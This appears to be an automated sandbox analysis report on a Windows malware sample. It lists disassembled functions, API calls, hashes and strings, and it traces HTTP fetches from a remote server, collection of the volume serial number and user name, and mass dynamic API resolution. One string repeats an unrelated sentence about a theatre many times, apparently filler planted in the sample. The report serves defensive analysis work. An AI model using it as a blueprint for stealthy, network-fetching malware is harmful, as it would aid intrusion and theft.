                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 67d5a7ff8b844a3cbca6447c9bf6c28e3a8f83b7a347986107ee2fd38ab57602
                                    • Instruction ID: bfa389ae86696d11ca1817148ec15a8b5866850fc9556b1331119be5d2337727
                                    • Opcode Fuzzy Hash: 67d5a7ff8b844a3cbca6447c9bf6c28e3a8f83b7a347986107ee2fd38ab57602
                                    • Instruction Fuzzy Hash: 704117686CA704EEE636B7F4ACE2EDF76A65F42708F5050C4E881526B2CFB069C14735
                                    Function 003662D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 3662d0-36635b call 37aab0 call 364800 call 37aa50 InternetOpenA StrCmpCA 1040 366364-366368 1033->1040 1041 36635d 1033->1041 1042 36636e-366392 InternetConnectA 1040->1042 1043 366559-366575 call 37aab0 call 37ab10 * 2 1040->1043 1041->1040 1045 36654f-366553 InternetCloseHandle 1042->1045 1046 366398-36639c 1042->1046 1062 366578-36657d 1043->1062 1045->1043 1048 36639e-3663a8 1046->1048 1049 3663aa 1046->1049 1051 3663b4-3663e2 HttpOpenRequestA 1048->1051 1049->1051 1052 366545-366549 InternetCloseHandle 1051->1052 1053 3663e8-3663ec 1051->1053 1052->1045 1055 366415-366455 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 3663ee-36640f InternetSetOptionA 1053->1056 1058 366457-366477 call 37aa50 call 37ab10 * 2 1055->1058 1059 36647c-36649b call 378ad0 1055->1059 1056->1055 1058->1062 1067 36649d-3664a4 1059->1067 1068 366519-366539 call 37aa50 call 37ab10 * 2 1059->1068 1071 3664a6-3664d0 InternetReadFile 1067->1071 1072 366517-36653f InternetCloseHandle 1067->1072 1068->1062 1076 3664d2-3664d9 1071->1076 1077 3664db 1071->1077 1072->1052 1076->1077 1078 3664dd-366515 call 37acc0 call 37abb0 call 37ab10 1076->1078 1077->1072 1078->1071
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 00364800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364889
                                      • Part of subcall function 00364800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364899
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • InternetOpenA.WININET(00380DFF,00000001,00000000,00000000,00000000), ref: 00366331
                                    • StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 00366353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00366385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00F3DBF0,00000000,00000000,00400100,00000000), ref: 003663D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0036640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00366421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0036644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003664BD
                                    • InternetCloseHandle.WININET(00000000), ref: 0036653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00366549
                                    • InternetCloseHandle.WININET(00000000), ref: 00366553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 5294354136d23e80c2bf6142013748df1c67fb80dd39f61311076ddc1afe0c89
                                    • Instruction ID: af5d08d6cadee8a1f61efc04ef956f318a4d5083816dbb860b9882ddcea4fbbc
                                    • Opcode Fuzzy Hash: 5294354136d23e80c2bf6142013748df1c67fb80dd39f61311076ddc1afe0c89
                                    • Instruction Fuzzy Hash: 1B714171A00218EBDB25DF94CC5AFEEB779BB44700F108198F60A6B194DBB56A84CF51
                                    Function 00377690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 377690-3776da GetWindowsDirectoryA 1357 3776e3-377757 GetVolumeInformationA call 378e90 * 3 1356->1357 1358 3776dc 1356->1358 1365 377768-37776f 1357->1365 1358->1357 1366 377771-37778a call 378e90 1365->1366 1367 37778c-3777a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 3777a9-3777b6 call 37aa50 1367->1369 1370 3777b8-3777e8 wsprintfA call 37aa50 1367->1370 1377 37780e-37781e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003776D2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0037770F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377793
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0037779A
                                    • wsprintfA.USER32 ref: 003777D0
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 984bf6c855220a241639472dc920ee364e7385ca18b4694e0eac280c351fd3a8
                                    • Instruction ID: 98d3611ad26cc3369e174ae9404baacf73327ed4d42f6d0c25856d2044044114
                                    • Opcode Fuzzy Hash: 984bf6c855220a241639472dc920ee364e7385ca18b4694e0eac280c351fd3a8
                                    • Instruction Fuzzy Hash: B441A7B1D04348EBDB21DF94DC85BEEB7B8AF48704F104099F509AB280D7786B44CBA5
                                    Function 003779E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003611B7), ref: 00377A10
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00377A17
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00377A2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 96d8f341a933a23603c31617f9cf3bba0aff75133b22c0b6a08d4000b9cd681f
                                    • Instruction ID: 9d72c432a0d9c64bc8d59d508b0ac07b249f01a91066de2456f2ea20fc2a8518
                                    • Opcode Fuzzy Hash: 96d8f341a933a23603c31617f9cf3bba0aff75133b22c0b6a08d4000b9cd681f
                                    • Instruction Fuzzy Hash: D2F04FB1D48209EBD710DF98DD45BAEBBB8EB05B11F10421AF615A2780C7B55600CBE1
                                    Function 00361160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: d961ea557126f44c6008c95705d85baef9bbfd78524f5e15bdcd0a60cf23b9a0
                                    • Instruction ID: c47bcd06407fcb8c6543086a2c3a9303e533312d17e2544211921b203c7b95b9
                                    • Opcode Fuzzy Hash: d961ea557126f44c6008c95705d85baef9bbfd78524f5e15bdcd0a60cf23b9a0
                                    • Instruction Fuzzy Hash: 64D05EB590430CABCB10DFE098496DDBB79BB08215F041554D90562240EA705451CAA5
                                    Function 00379F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 379f20-379f2a 634 37a346-37a3da LoadLibraryA * 8 633->634 635 379f30-37a341 GetProcAddress * 43 633->635 636 37a456-37a45d 634->636 637 37a3dc-37a451 GetProcAddress * 5 634->637 635->634 638 37a526-37a52d 636->638 639 37a463-37a521 GetProcAddress * 8 636->639 637->636 640 37a52f-37a5a3 GetProcAddress * 5 638->640 641 37a5a8-37a5af 638->641 639->638 640->641 642 37a647-37a64e 641->642 643 37a5b5-37a642 GetProcAddress * 6 641->643 644 37a654-37a72a GetProcAddress * 9 642->644 645 37a72f-37a736 642->645 643->642 644->645 646 37a7b2-37a7b9 645->646 647 37a738-37a7ad GetProcAddress * 5 645->647 648 37a7ec-37a7f3 646->648 649 37a7bb-37a7e7 GetProcAddress * 2 646->649 647->646 650 37a825-37a82c 648->650 651 37a7f5-37a820 GetProcAddress * 2 648->651 649->648 652 37a922-37a929 650->652 653 37a832-37a91d GetProcAddress * 10 650->653 651->650 654 37a98d-37a994 652->654 655 37a92b-37a988 GetProcAddress * 4 652->655 653->652 656 37a996-37a9a9 GetProcAddress 654->656 657 37a9ae-37a9b5 654->657 655->654 656->657 658 37a9b7-37aa13 GetProcAddress * 4 657->658 659 37aa18-37aa19 657->659 658->659
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00F26640), ref: 00379F3D
                                    • GetProcAddress.KERNEL32(75900000,00F262E0), ref: 00379F55
                                    • GetProcAddress.KERNEL32(75900000,00F38F40), ref: 00379F6E
                                    • GetProcAddress.KERNEL32(75900000,00F38F88), ref: 00379F86
                                    • GetProcAddress.KERNEL32(75900000,00F3C9D0), ref: 00379F9E
                                    • GetProcAddress.KERNEL32(75900000,00F3C988), ref: 00379FB7
                                    • GetProcAddress.KERNEL32(75900000,00F2B4F0), ref: 00379FCF
                                    • GetProcAddress.KERNEL32(75900000,00F3C850), ref: 00379FE7
                                    • GetProcAddress.KERNEL32(75900000,00F3C9B8), ref: 0037A000
                                    • GetProcAddress.KERNEL32(75900000,00F3C970), ref: 0037A018
                                    • GetProcAddress.KERNEL32(75900000,00F3C9E8), ref: 0037A030
                                    • GetProcAddress.KERNEL32(75900000,00F26500), ref: 0037A049
                                    • GetProcAddress.KERNEL32(75900000,00F265C0), ref: 0037A061
                                    • GetProcAddress.KERNEL32(75900000,00F26320), ref: 0037A079
                                    • GetProcAddress.KERNEL32(75900000,00F26360), ref: 0037A092
                                    • GetProcAddress.KERNEL32(75900000,00F3CA60), ref: 0037A0AA
                                    • GetProcAddress.KERNEL32(75900000,00F3C928), ref: 0037A0C2
                                    • GetProcAddress.KERNEL32(75900000,00F2B540), ref: 0037A0DB
                                    • GetProcAddress.KERNEL32(75900000,00F26380), ref: 0037A0F3
                                    • GetProcAddress.KERNEL32(75900000,00F3C940), ref: 0037A10B
                                    • GetProcAddress.KERNEL32(75900000,00F3CA00), ref: 0037A124
                                    • GetProcAddress.KERNEL32(75900000,00F3C868), ref: 0037A13C
                                    • GetProcAddress.KERNEL32(75900000,00F3C880), ref: 0037A154
                                    • GetProcAddress.KERNEL32(75900000,00F26580), ref: 0037A16D
                                    • GetProcAddress.KERNEL32(75900000,00F3CA18), ref: 0037A185
                                    • GetProcAddress.KERNEL32(75900000,00F3C958), ref: 0037A19D
                                    • GetProcAddress.KERNEL32(75900000,00F3C8B0), ref: 0037A1B6
                                    • GetProcAddress.KERNEL32(75900000,00F3CAD8), ref: 0037A1CE
                                    • GetProcAddress.KERNEL32(75900000,00F3CA48), ref: 0037A1E6
                                    • GetProcAddress.KERNEL32(75900000,00F3C9A0), ref: 0037A1FF
                                    • GetProcAddress.KERNEL32(75900000,00F3CAC0), ref: 0037A217
                                    • GetProcAddress.KERNEL32(75900000,00F3C910), ref: 0037A22F
                                    • GetProcAddress.KERNEL32(75900000,00F3CA30), ref: 0037A248
                                    • GetProcAddress.KERNEL32(75900000,00F39918), ref: 0037A260
                                    • GetProcAddress.KERNEL32(75900000,00F3CA78), ref: 0037A278
                                    • GetProcAddress.KERNEL32(75900000,00F3CA90), ref: 0037A291
                                    • GetProcAddress.KERNEL32(75900000,00F263A0), ref: 0037A2A9
                                    • GetProcAddress.KERNEL32(75900000,00F3CAA8), ref: 0037A2C1
                                    • GetProcAddress.KERNEL32(75900000,00F26400), ref: 0037A2DA
                                    • GetProcAddress.KERNEL32(75900000,00F3C8F8), ref: 0037A2F2
                                    • GetProcAddress.KERNEL32(75900000,00F3C820), ref: 0037A30A
                                    • GetProcAddress.KERNEL32(75900000,00F26420), ref: 0037A323
                                    • GetProcAddress.KERNEL32(75900000,00F26440), ref: 0037A33B
                                    • LoadLibraryA.KERNEL32(00F3C7F0,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A34D
                                    • LoadLibraryA.KERNEL32(00F3C898,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A35E
                                    • LoadLibraryA.KERNEL32(00F3C808,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A370
                                    • LoadLibraryA.KERNEL32(00F3C838,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A382
                                    • LoadLibraryA.KERNEL32(00F3C8C8,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A393
                                    • LoadLibraryA.KERNEL32(00F3C8E0,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A3A5
                                    • LoadLibraryA.KERNEL32(00F3CBB0,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A3B7
                                    • LoadLibraryA.KERNEL32(00F3CD30,?,00375EF3,00380AEB,?,?,?,?,?,?,?,?,?,?,00380AEA,00380AE7), ref: 0037A3C8
                                    • GetProcAddress.KERNEL32(75FD0000,00F26A20), ref: 0037A3EA
                                    • GetProcAddress.KERNEL32(75FD0000,00F3CDC0), ref: 0037A402
                                    • GetProcAddress.KERNEL32(75FD0000,00F38B40), ref: 0037A41A
                                    • GetProcAddress.KERNEL32(75FD0000,00F3CDD8), ref: 0037A433
                                    • GetProcAddress.KERNEL32(75FD0000,00F26740), ref: 0037A44B
                                    • GetProcAddress.KERNEL32(734B0000,00F2B298), ref: 0037A470
                                    • GetProcAddress.KERNEL32(734B0000,00F26840), ref: 0037A489
                                    • GetProcAddress.KERNEL32(734B0000,00F2B040), ref: 0037A4A1
                                    • GetProcAddress.KERNEL32(734B0000,00F3CD48), ref: 0037A4B9
                                    • GetProcAddress.KERNEL32(734B0000,00F3CBF8), ref: 0037A4D2
                                    • GetProcAddress.KERNEL32(734B0000,00F26900), ref: 0037A4EA
                                    • GetProcAddress.KERNEL32(734B0000,00F26860), ref: 0037A502
                                    • GetProcAddress.KERNEL32(734B0000,00F3CDA8), ref: 0037A51B
                                    • GetProcAddress.KERNEL32(763B0000,00F269A0), ref: 0037A53C
                                    • GetProcAddress.KERNEL32(763B0000,00F267E0), ref: 0037A554
                                    • GetProcAddress.KERNEL32(763B0000,00F3CCD0), ref: 0037A56D
                                    • GetProcAddress.KERNEL32(763B0000,00F3CCE8), ref: 0037A585
                                    • GetProcAddress.KERNEL32(763B0000,00F26760), ref: 0037A59D
                                    • GetProcAddress.KERNEL32(750F0000,00F2AEB0), ref: 0037A5C3
                                    • GetProcAddress.KERNEL32(750F0000,00F2AFC8), ref: 0037A5DB
                                    • GetProcAddress.KERNEL32(750F0000,00F3CAF0), ref: 0037A5F3
                                    • GetProcAddress.KERNEL32(750F0000,00F26940), ref: 0037A60C
                                    • GetProcAddress.KERNEL32(750F0000,00F26680), ref: 0037A624
                                    • GetProcAddress.KERNEL32(750F0000,00F2B248), ref: 0037A63C
                                    • GetProcAddress.KERNEL32(75A50000,00F3CB68), ref: 0037A662
                                    • GetProcAddress.KERNEL32(75A50000,00F26880), ref: 0037A67A
                                    • GetProcAddress.KERNEL32(75A50000,00F38B00), ref: 0037A692
                                    • GetProcAddress.KERNEL32(75A50000,00F3CB80), ref: 0037A6AB
                                    • GetProcAddress.KERNEL32(75A50000,00F3CD60), ref: 0037A6C3
                                    • GetProcAddress.KERNEL32(75A50000,00F269E0), ref: 0037A6DB
                                    • GetProcAddress.KERNEL32(75A50000,00F266A0), ref: 0037A6F4
                                    • GetProcAddress.KERNEL32(75A50000,00F3CD78), ref: 0037A70C
                                    • GetProcAddress.KERNEL32(75A50000,00F3CB08), ref: 0037A724
                                    • GetProcAddress.KERNEL32(75070000,00F266E0), ref: 0037A746
                                    • GetProcAddress.KERNEL32(75070000,00F3CCA0), ref: 0037A75E
                                    • GetProcAddress.KERNEL32(75070000,00F3CD18), ref: 0037A776
                                    • GetProcAddress.KERNEL32(75070000,00F3CC40), ref: 0037A78F
                                    • GetProcAddress.KERNEL32(75070000,00F3CB20), ref: 0037A7A7
                                    • GetProcAddress.KERNEL32(74E50000,00F26920), ref: 0037A7C8
                                    • GetProcAddress.KERNEL32(74E50000,00F269C0), ref: 0037A7E1
                                    • GetProcAddress.KERNEL32(75320000,00F268E0), ref: 0037A802
                                    • GetProcAddress.KERNEL32(75320000,00F3CB38), ref: 0037A81A
